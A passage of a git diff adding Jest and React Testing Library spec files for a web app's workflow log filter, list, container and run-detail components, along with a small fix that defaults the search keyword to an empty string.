expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/my-app/workflow-runs/my-run') + }) + + it('should generate correct tracing list URL', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'my-app' }) }) + + render() + + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('/apps/my-app/workflow-runs/my-run/node-executions') + }) + + it('should handle special characters in runID', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/app-id/workflow-runs/run-with-special-123') + }) + }) + + // -------------------------------------------------------------------------- + // Store Integration Tests + // -------------------------------------------------------------------------- + describe('Store Integration', () => { + it('should read appDetail from store', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'store-app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/store-app-id/workflow-runs/run-123') + }) + + it('should handle undefined appDetail from store gracefully', () => { + useAppStore.setState({ appDetail: undefined }) + + render() + + // Run component should still render but with undefined in URL + expect(screen.getByTestId('workflow-run')).toBeInTheDocument() + }) + }) + + // 
-------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle empty runID', () => { + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('') + }) + + it('should handle very long runID', () => { + const longRunId = 'a'.repeat(100) + useAppStore.setState({ appDetail: createMockApp({ id: 'app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent(`/apps/app-id/workflow-runs/${longRunId}`) + }) + + it('should render replay button with correct aria-label', () => { + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toHaveAttribute('aria-label', 'appLog.runDetail.testWithParams') + }) + + it('should maintain proper component structure', () => { + const { container } = render() + + // Check for main container with flex layout + const mainContainer = container.querySelector('.flex.grow.flex-col') + expect(mainContainer).toBeInTheDocument() + + // Check for header section + const header = container.querySelector('.flex.items-center.bg-components-panel-bg') + expect(header).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Tooltip Tests + // -------------------------------------------------------------------------- + describe('Tooltip', () => { + it('should have tooltip on replay button', () => { + render() + + // The replay button should be wrapped in TooltipPlus + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toBeInTheDocument() + + // TooltipPlus wraps the button with popupContent + // We verify the button exists with the correct aria-label + expect(replayButton).toHaveAttribute('type', 'button') + }) + }) +}) diff --git a/web/app/components/app/workflow-log/filter.spec.tsx b/web/app/components/app/workflow-log/filter.spec.tsx new file mode 100644 index 0000000000..04216e5cc8 --- /dev/null +++ b/web/app/components/app/workflow-log/filter.spec.tsx @@ -0,0 +1,537 @@ +/** + * Filter Component Tests + * + * Tests the workflow log filter component which provides: + * - Status filtering (all, succeeded, failed, stopped, partial-succeeded) + * - Time period selection + * - Keyword search + */ + +import { useState } from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import Filter, { TIME_PERIOD_MAPPING } from './filter' +import type { QueryParam } from './index' + +// ============================================================================ +// Mocks +// ============================================================================ + +const mockTrackEvent = jest.fn() +jest.mock('@/app/components/base/amplitude/utils', () => ({ + trackEvent: (...args: unknown[]) => mockTrackEvent(...args), +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createDefaultQueryParams = (overrides: Partial = {}): QueryParam => ({ + status: 'all', + period: '2', // default to last 7 days + ...overrides, +}) + +// 
============================================================================ +// Tests +// ============================================================================ + +describe('Filter', () => { + const defaultSetQueryParams = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render( + , + ) + + // Should render status chip, period chip, and search input + expect(screen.getByText('All')).toBeInTheDocument() + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + + it('should render all filter components', () => { + render( + , + ) + + // Status chip + expect(screen.getByText('All')).toBeInTheDocument() + // Period chip (shows translated key) + expect(screen.getByText('appLog.filter.period.last7days')).toBeInTheDocument() + // Search input + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Status Filter Tests + // -------------------------------------------------------------------------- + describe('Status Filter', () => { + it('should display current status value', () => { + render( + , + ) + + // Chip should show Success for succeeded status + expect(screen.getByText('Success')).toBeInTheDocument() + }) + + it('should open status dropdown when clicked', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('All')) + + // Should show all status options + await waitFor(() => { + expect(screen.getByText('Success')).toBeInTheDocument() + expect(screen.getByText('Fail')).toBeInTheDocument() + expect(screen.getByText('Stop')).toBeInTheDocument() + expect(screen.getByText('Partial Success')).toBeInTheDocument() + }) + }) + + it('should call setQueryParams when status is selected', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'succeeded', + period: '2', + }) + }) + + it('should track status selection event', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Fail')) + + expect(mockTrackEvent).toHaveBeenCalledWith( + 'workflow_log_filter_status_selected', + { workflow_log_filter_status: 'failed' }, + ) + }) + + it('should reset to all when status is cleared', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + const { container } = render( + , + ) + + // Find the clear icon (div with group/clear class) in the status chip + const clearIcon = container.querySelector('.group\\/clear') + + expect(clearIcon).toBeInTheDocument() + await user.click(clearIcon!) 
+ + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + }) + }) + + test.each([ + ['all', 'All'], + ['succeeded', 'Success'], + ['failed', 'Fail'], + ['stopped', 'Stop'], + ['partial-succeeded', 'Partial Success'], + ])('should display correct label for %s status', (statusValue, expectedLabel) => { + render( + , + ) + + expect(screen.getByText(expectedLabel)).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Time Period Filter Tests + // -------------------------------------------------------------------------- + describe('Time Period Filter', () => { + it('should display current period value', () => { + render( + , + ) + + expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + }) + + it('should open period dropdown when clicked', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + + // Should show all period options + await waitFor(() => { + expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.last4weeks')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.last3months')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.allTime')).toBeInTheDocument() + }) + }) + + it('should call setQueryParams when period is selected', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await screen.findByText('appLog.filter.period.allTime')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '9', + }) + }) + + it('should reset period to allTime when cleared', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + // Find the period chip's clear button + const periodChip = screen.getByText('appLog.filter.period.last7days').closest('div') + const clearButton = periodChip?.querySelector('button[type="button"]') + + if (clearButton) { + await user.click(clearButton) + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '9', + }) + } + }) + }) + + // -------------------------------------------------------------------------- + // Keyword Search Tests + // -------------------------------------------------------------------------- + describe('Keyword Search', () => { + it('should display current keyword value', () => { + render( + , + ) + + expect(screen.getByDisplayValue('test search')).toBeInTheDocument() + }) + + it('should call setQueryParams when typing in search', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + const Wrapper = () => { + const [queryParams, updateQueryParams] = useState(createDefaultQueryParams()) + const handleSetQueryParams = (next: QueryParam) => { + updateQueryParams(next) + setQueryParams(next) + } + return ( + + ) + } + + render() + + const input = screen.getByPlaceholderText('common.operation.search') + await user.type(input, 'workflow') + + // Should call setQueryParams for each character typed + expect(setQueryParams).toHaveBeenLastCalledWith( + expect.objectContaining({ keyword: 'workflow' }), + ) + }) + + it('should clear keyword when clear button is clicked', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + const { container } = render( + , + ) + + // The Input 
component renders a clear icon div inside the input wrapper + // when showClearIcon is true and value exists + const inputWrapper = container.querySelector('.w-\\[200px\\]') + + // Find the clear icon div (has cursor-pointer class and contains RiCloseCircleFill) + const clearIconDiv = inputWrapper?.querySelector('div.cursor-pointer') + + expect(clearIconDiv).toBeInTheDocument() + await user.click(clearIconDiv!) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + keyword: '', + }) + }) + + it('should update on direct input change', () => { + const setQueryParams = jest.fn() + + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + fireEvent.change(input, { target: { value: 'new search' } }) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + keyword: 'new search', + }) + }) + }) + + // -------------------------------------------------------------------------- + // TIME_PERIOD_MAPPING Tests + // -------------------------------------------------------------------------- + describe('TIME_PERIOD_MAPPING', () => { + it('should have correct mapping for today', () => { + expect(TIME_PERIOD_MAPPING['1']).toEqual({ value: 0, name: 'today' }) + }) + + it('should have correct mapping for last 7 days', () => { + expect(TIME_PERIOD_MAPPING['2']).toEqual({ value: 7, name: 'last7days' }) + }) + + it('should have correct mapping for last 4 weeks', () => { + expect(TIME_PERIOD_MAPPING['3']).toEqual({ value: 28, name: 'last4weeks' }) + }) + + it('should have correct mapping for all time', () => { + expect(TIME_PERIOD_MAPPING['9']).toEqual({ value: -1, name: 'allTime' }) + }) + + it('should have all 9 predefined time periods', () => { + expect(Object.keys(TIME_PERIOD_MAPPING)).toHaveLength(9) + }) + + test.each([ + ['1', 'today', 0], + ['2', 'last7days', 7], + ['3', 'last4weeks', 28], + ['9', 'allTime', -1], + ])('TIME_PERIOD_MAPPING[%s] should have name=%s and correct value', (key, name, expectedValue) => { + const mapping = TIME_PERIOD_MAPPING[key] + expect(mapping.name).toBe(name) + if (expectedValue >= 0) + expect(mapping.value).toBe(expectedValue) + else + expect(mapping.value).toBe(-1) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle undefined keyword gracefully', () => { + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + expect(input).toHaveValue('') + }) + + it('should handle empty string keyword', () => { + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + expect(input).toHaveValue('') + }) + + it('should preserve other query params when updating status', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'succeeded', + period: '3', + keyword: 'test', + }) + }) + + it('should preserve other query params when updating period', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await screen.findByText('appLog.filter.period.today')) + + 
expect(setQueryParams).toHaveBeenCalledWith({ + status: 'failed', + period: '1', + keyword: 'test', + }) + }) + + it('should preserve other query params when updating keyword', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + await user.type(input, 'a') + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'failed', + period: '3', + keyword: 'a', + }) + }) + }) + + // -------------------------------------------------------------------------- + // Integration Tests + // -------------------------------------------------------------------------- + describe('Integration', () => { + it('should render with all filters visible simultaneously', () => { + render( + , + ) + + expect(screen.getByText('Success')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + expect(screen.getByDisplayValue('integration test')).toBeInTheDocument() + }) + + it('should have proper layout with flex and gap', () => { + const { container } = render( + , + ) + + const filterContainer = container.firstChild as HTMLElement + expect(filterContainer).toHaveClass('flex') + expect(filterContainer).toHaveClass('flex-row') + expect(filterContainer).toHaveClass('gap-2') + }) + }) +}) diff --git a/web/app/components/app/workflow-log/filter.tsx b/web/app/components/app/workflow-log/filter.tsx index 0c8d72c1be..a4db4c9642 100644 --- a/web/app/components/app/workflow-log/filter.tsx +++ b/web/app/components/app/workflow-log/filter.tsx @@ -65,7 +65,7 @@ const Filter: FC = ({ queryParams, setQueryParams }: IFilterProps) wrapperClassName='w-[200px]' showLeftIcon showClearIcon - value={queryParams.keyword} + value={queryParams.keyword ?? 
''} placeholder={t('common.operation.search')!} onChange={(e) => { setQueryParams({ ...queryParams, keyword: e.target.value }) diff --git a/web/app/components/app/workflow-log/index.spec.tsx b/web/app/components/app/workflow-log/index.spec.tsx new file mode 100644 index 0000000000..e6d9f37949 --- /dev/null +++ b/web/app/components/app/workflow-log/index.spec.tsx @@ -0,0 +1,592 @@ +/** + * Logs Container Component Tests + * + * Tests the main Logs container component which: + * - Fetches workflow logs via useSWR + * - Manages query parameters (status, period, keyword) + * - Handles pagination + * - Renders Filter, List, and Empty states + * + * Note: Individual component tests are in their respective spec files: + * - filter.spec.tsx + * - list.spec.tsx + * - detail.spec.tsx + * - trigger-by-display.spec.tsx + */ + +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import useSWR from 'swr' +import Logs, { type ILogsProps } from './index' +import { TIME_PERIOD_MAPPING } from './filter' +import type { App, AppIconType, AppModeEnum } from '@/types/app' +import type { WorkflowAppLogDetail, WorkflowLogsResponse, WorkflowRunDetail } from '@/models/log' +import { WorkflowRunTriggeredFrom } from '@/models/log' +import { APP_PAGE_LIMIT } from '@/config' + +// ============================================================================ +// Mocks +// ============================================================================ + +jest.mock('swr') + +jest.mock('ahooks', () => ({ + useDebounce: (value: T) => value, + useDebounceFn: (fn: (value: string) => void) => ({ run: fn }), + useBoolean: (initial: boolean) => { + const setters = { + setTrue: jest.fn(), + setFalse: jest.fn(), + toggle: jest.fn(), + } + return [initial, setters] as const + }, +})) + +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: jest.fn(), + }), +})) + +jest.mock('next/link', () => ({ + __esModule: true, + default: ({ children, href }: { children: React.ReactNode; href: string }) => {children}, +})) + +// Mock the Run component to avoid complex dependencies +jest.mock('@/app/components/workflow/run', () => ({ + __esModule: true, + default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( +
<div data-testid='workflow-run'> + <span data-testid='run-detail-url'>{runDetailUrl}</span> + <span data-testid='tracing-list-url'>{tracingListUrl}</span> + </div>
    + ), +})) + +const mockTrackEvent = jest.fn() +jest.mock('@/app/components/base/amplitude/utils', () => ({ + trackEvent: (...args: unknown[]) => mockTrackEvent(...args), +})) + +jest.mock('@/service/log', () => ({ + fetchWorkflowLogs: jest.fn(), +})) + +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => { + const { Theme } = require('@/types/app') + return { theme: Theme.light } + }, +})) + +jest.mock('@/context/app-context', () => ({ + useAppContext: () => ({ + userProfile: { timezone: 'UTC' }, + }), +})) + +// Mock useTimestamp +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: (timestamp: number, _format: string) => `formatted-${timestamp}`, + }), +})) + +// Mock useBreakpoints +jest.mock('@/hooks/use-breakpoints', () => ({ + __esModule: true, + default: () => 'pc', + MediaType: { + mobile: 'mobile', + pc: 'pc', + }, +})) + +// Mock BlockIcon +jest.mock('@/app/components/workflow/block-icon', () => ({ + __esModule: true, + default: () =>
<div>BlockIcon</div>
    , +})) + +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
<div data-testid='workflow-context-provider'>{children}</div>
    + ), +})) + +const mockedUseSWR = useSWR as jest.MockedFunction + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + author_name: 'Test Author', + icon_type: 'emoji' as AppIconType, + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: 'workflow' as AppModeEnum, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +const createMockWorkflowRun = (overrides: Partial = {}): WorkflowRunDetail => ({ + id: 'run-1', + version: '1.0.0', + status: 'succeeded', + elapsed_time: 1.234, + total_tokens: 100, + total_price: 0.001, + currency: 'USD', + total_steps: 5, + finished_at: Date.now(), + triggered_from: WorkflowRunTriggeredFrom.APP_RUN, + ...overrides, +}) + +const createMockWorkflowLog = (overrides: Partial = {}): WorkflowAppLogDetail => ({ + id: 'log-1', + workflow_run: createMockWorkflowRun(), + created_from: 'web-app', + created_by_role: 'account', + created_by_account: { + id: 'account-1', + name: 'Test User', + email: 'test@example.com', + }, + created_at: Date.now(), + ...overrides, +}) + +const createMockLogsResponse = ( + data: WorkflowAppLogDetail[] = [], + total = data.length, +): WorkflowLogsResponse => ({ + data, + has_more: data.length < total, + limit: APP_PAGE_LIMIT, + total, + page: 1, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('Logs Container', () => { + const defaultProps: ILogsProps = { + appDetail: createMockApp(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('appLog.workflowTitle')).toBeInTheDocument() + }) + + it('should render title and subtitle', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('appLog.workflowTitle')).toBeInTheDocument() + expect(screen.getByText('appLog.workflowSubtitle')).toBeInTheDocument() + }) + + it('should render Filter component', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + }) + + // 
-------------------------------------------------------------------------- + // Loading State Tests + // -------------------------------------------------------------------------- + describe('Loading State', () => { + it('should show loading spinner when data is undefined', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + mutate: jest.fn(), + isValidating: true, + isLoading: true, + error: undefined, + }) + + const { container } = render() + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should not show loading spinner when data is available', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const { container } = render() + + expect(container.querySelector('.spin-animation')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Empty State Tests + // -------------------------------------------------------------------------- + describe('Empty State', () => { + it('should render empty element when total is 0', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('appLog.table.empty.element.title')).toBeInTheDocument() + expect(screen.queryByRole('table')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Data Fetching Tests + // -------------------------------------------------------------------------- + describe('Data Fetching', () => { + it('should call useSWR with correct URL and default params', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { url: string; params: Record } + expect(keyArg).toMatchObject({ + url: `/apps/${defaultProps.appDetail.id}/workflow-app-logs`, + params: expect.objectContaining({ + page: 1, + detail: true, + limit: APP_PAGE_LIMIT, + }), + }) + }) + + it('should include date filters for non-allTime periods', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(keyArg?.params).toHaveProperty('created_at__after') + expect(keyArg?.params).toHaveProperty('created_at__before') + }) + + it('should not include status param when status is all', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(keyArg?.params).not.toHaveProperty('status') + }) + }) + + // -------------------------------------------------------------------------- + // Filter Integration Tests + // -------------------------------------------------------------------------- + describe('Filter Integration', () => { + it('should update query when selecting status filter', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + 
isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Click status filter + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + // Check that useSWR was called with updated params + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(lastCall?.params).toMatchObject({ + status: 'succeeded', + }) + }) + }) + + it('should update query when selecting period filter', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Click period filter + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await screen.findByText('appLog.filter.period.allTime')) + + // When period is allTime (9), date filters should be removed + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(lastCall?.params).not.toHaveProperty('created_at__after') + expect(lastCall?.params).not.toHaveProperty('created_at__before') + }) + }) + + it('should update query when typing keyword', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const searchInput = screen.getByPlaceholderText('common.operation.search') + await user.type(searchInput, 'test-keyword') + + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(lastCall?.params).toMatchObject({ + keyword: 'test-keyword', + }) + }) + }) + }) + + // -------------------------------------------------------------------------- + // Pagination Tests + // -------------------------------------------------------------------------- + describe('Pagination', () => { + it('should not render pagination when total is less than limit', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Pagination component should not be rendered + expect(screen.queryByRole('navigation')).not.toBeInTheDocument() + }) + + it('should render pagination when total exceeds limit', () => { + const logs = Array.from({ length: APP_PAGE_LIMIT }, (_, i) => + createMockWorkflowLog({ id: `log-${i}` }), + ) + + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse(logs, APP_PAGE_LIMIT + 10), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Should show pagination - checking for any pagination-related element + // The Pagination component renders page controls + expect(screen.getByRole('table')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // List Rendering Tests + // -------------------------------------------------------------------------- + describe('List Rendering', () => { + it('should render List component when data is available', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByRole('table')).toBeInTheDocument() + }) + + it('should 
display log data in table', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + status: 'succeeded', + total_tokens: 500, + }), + }), + ], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('Success')).toBeInTheDocument() + expect(screen.getByText('500')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // TIME_PERIOD_MAPPING Export Tests + // -------------------------------------------------------------------------- + describe('TIME_PERIOD_MAPPING', () => { + it('should export TIME_PERIOD_MAPPING with correct values', () => { + expect(TIME_PERIOD_MAPPING['1']).toEqual({ value: 0, name: 'today' }) + expect(TIME_PERIOD_MAPPING['2']).toEqual({ value: 7, name: 'last7days' }) + expect(TIME_PERIOD_MAPPING['9']).toEqual({ value: -1, name: 'allTime' }) + expect(Object.keys(TIME_PERIOD_MAPPING)).toHaveLength(9) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle different app modes', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render() + + // Should render without trigger column + expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() + }) + + it('should handle error state from useSWR', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: new Error('Failed to fetch'), + }) + + const { container } = render() + + // Should show loading state when data is undefined + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should handle app with different ID', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const customApp = createMockApp({ id: 'custom-app-123' }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { url: string } + expect(keyArg?.url).toBe('/apps/custom-app-123/workflow-app-logs') + }) + }) +}) diff --git a/web/app/components/app/workflow-log/list.spec.tsx b/web/app/components/app/workflow-log/list.spec.tsx new file mode 100644 index 0000000000..be54dbc2f3 --- /dev/null +++ b/web/app/components/app/workflow-log/list.spec.tsx @@ -0,0 +1,751 @@ +/** + * WorkflowAppLogList Component Tests + * + * Tests the workflow log list component which displays: + * - Table of workflow run logs with sortable columns + * - Status indicators (success, failed, stopped, running, partial-succeeded) + * - Trigger display for workflow apps + * - Drawer with run details + * - Loading states + */ + +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import WorkflowAppLogList from './list' +import { useStore as useAppStore } from '@/app/components/app/store' +import type { App, AppIconType, AppModeEnum } from '@/types/app' +import type { WorkflowAppLogDetail, WorkflowLogsResponse, WorkflowRunDetail } from 
'@/models/log' +import { WorkflowRunTriggeredFrom } from '@/models/log' +import { APP_PAGE_LIMIT } from '@/config' + +// ============================================================================ +// Mocks +// ============================================================================ + +const mockRouterPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockRouterPush, + }), +})) + +// Mock useTimestamp hook +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: (timestamp: number, _format: string) => `formatted-${timestamp}`, + }), +})) + +// Mock useBreakpoints hook +jest.mock('@/hooks/use-breakpoints', () => ({ + __esModule: true, + default: () => 'pc', // Return desktop by default + MediaType: { + mobile: 'mobile', + pc: 'pc', + }, +})) + +// Mock the Run component +jest.mock('@/app/components/workflow/run', () => ({ + __esModule: true, + default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( +
<div data-testid='workflow-run'> + <span data-testid='run-detail-url'>{runDetailUrl}</span> + <span data-testid='tracing-list-url'>{tracingListUrl}</span> + </div>
    + ), +})) + +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
<div data-testid='workflow-context-provider'>{children}</div>
    + ), +})) + +// Mock BlockIcon +jest.mock('@/app/components/workflow/block-icon', () => ({ + __esModule: true, + default: () =>
<div>BlockIcon</div>
    , +})) + +// Mock useTheme +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => { + const { Theme } = require('@/types/app') + return { theme: Theme.light } + }, +})) + +// Mock ahooks +jest.mock('ahooks', () => ({ + useBoolean: (initial: boolean) => { + const setters = { + setTrue: jest.fn(), + setFalse: jest.fn(), + toggle: jest.fn(), + } + return [initial, setters] as const + }, +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + author_name: 'Test Author', + icon_type: 'emoji' as AppIconType, + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: 'workflow' as AppModeEnum, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, 